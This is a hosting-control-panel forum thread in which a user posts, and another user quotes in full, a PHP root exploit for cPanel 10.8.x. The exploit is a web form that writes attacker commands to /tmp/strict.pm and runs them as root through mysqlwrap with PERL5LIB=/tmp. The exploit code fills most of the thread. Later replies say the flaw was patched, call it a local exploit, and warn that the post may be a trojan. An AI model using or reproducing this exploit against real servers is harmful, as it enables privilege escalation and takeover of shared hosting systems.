rustelekom

Well-Known Member
PartnerNOC
Nov 13, 2003
290
0
166
moscow
original advisory http://www.securitylab.ru/poc/extra/275416.php



<!- for use old cpanel exploit ( http://www.milw0rm.com/exploits/2466 ) you need have
<!- bash shell access on victim server but with this new exploit you only need
<!- to upload php file and run this into browser on victim servers.
<!- then you have root Access and you can do anything ....
<!- Coded by nima salehi ( [email protected] )
<!- Ashiyane Security Corporation www.Ashiyane.ir >
<title>cPanel <= 10.8.x cpwrap root exploit (PHP)</title>
<center><img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"><br><br>
<?

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
echo "<br><br><br><br><br>Sorry Safe-mode Is On ( Script Not Work On This Server ) <br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}

$disablef = @ini_get("disable_functions");
if (!empty($disablef))
{
$disablef = str_replace(" ","",$disablef);
$disablef = explode(",",$disablef);
if (in_array("passthru",$disablef))
{
echo "<br><br><br><br><br>Sorry Passthru Is Disable ( Script Not Work On This Server ) <br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
}

?>

<form method="POST" action="<?php echo $surl; ?>">
Command : <input type="text" name="c" size="40">
<input type="submit" value=" Run " name="B1"></form>
<textarea cols="60" rows="20" readonly>
<?php
$cmd=$_POST['c'];
if ( $cmd != "" )
{
$f=fopen("/tmp/strict.pm", "w");
fputs($f,'system("'.$cmd.'");');
fclose($f);
passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
}
?>
</textarea>
<br>
Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
</center>

# milw0rm.com [2006-10-13]
 

Murtaza_t

Well-Known Member
Jan 24, 2005
476
0
166
Earth
cPanel Access Level
Website Owner
rustelekom said:
original advisory http://www.securitylab.ru/poc/extra/275416.php



<!- for use old cpanel exploit ( http://www.milw0rm.com/exploits/2466 ) you need have
<!- bash shell access on victim server but with this new exploit you only need
<!- to upload php file and run this into browser on victim servers.
<!- then you have root Access and you can do anything ....
<!- Coded by nima salehi ( [email protected] )
<!- Ashiyane Security Corporation www.Ashiyane.ir >
<title>cPanel <= 10.8.x cpwrap root exploit (PHP)</title>
<center><img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"><br><br>
<?

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
echo "<br><br><br><br><br>Sorry Safe-mode Is On ( Script Not Work On This Server ) <br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}

$disablef = @ini_get("disable_functions");
if (!empty($disablef))
{
$disablef = str_replace(" ","",$disablef);
$disablef = explode(",",$disablef);
if (in_array("passthru",$disablef))
{
echo "<br><br><br><br><br>Sorry Passthru Is Disable ( Script Not Work On This Server ) <br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
}

?>

<form method="POST" action="<?php echo $surl; ?>">
Command : <input type="text" name="c" size="40">
<input type="submit" value=" Run " name="B1"></form>
<textarea cols="60" rows="20" readonly>
<?php
$cmd=$_POST['c'];
if ( $cmd != "" )
{
$f=fopen("/tmp/strict.pm", "w");
fputs($f,'system("'.$cmd.'");');
fclose($f);
passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
}
?>
</textarea>
<br>
Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
</center>

# milw0rm.com [2006-10-13]
Is this true..? I think cPanel has already dealt with mysqlwrap exploit.. haven't they?
 

pjman

Well-Known Member
Mar 22, 2003
101
0
166
New York
Yeah, they did.

This was 10.8 issue. If you ran a force upcp in the last two weeks, you're in the clear.:eek: It's a local exploit.
 

Spiral

BANNED
Jun 24, 2005
2,020
8
193
It wouldn't even work on a properly secured server and this one is pretty laughable!
 

nyjimbo

Well-Known Member
Jan 25, 2003
1,136
1
168
New York
Why is a very old exploit being brought up again with references to Mercury Mail, which is NOT something that can even run under unix/Linux or the Cpanel environment?.

DO NOT run the above "fixes", this thing smells of a trojan horse or some other kind of attempt to fool users into running bad code.

:mad: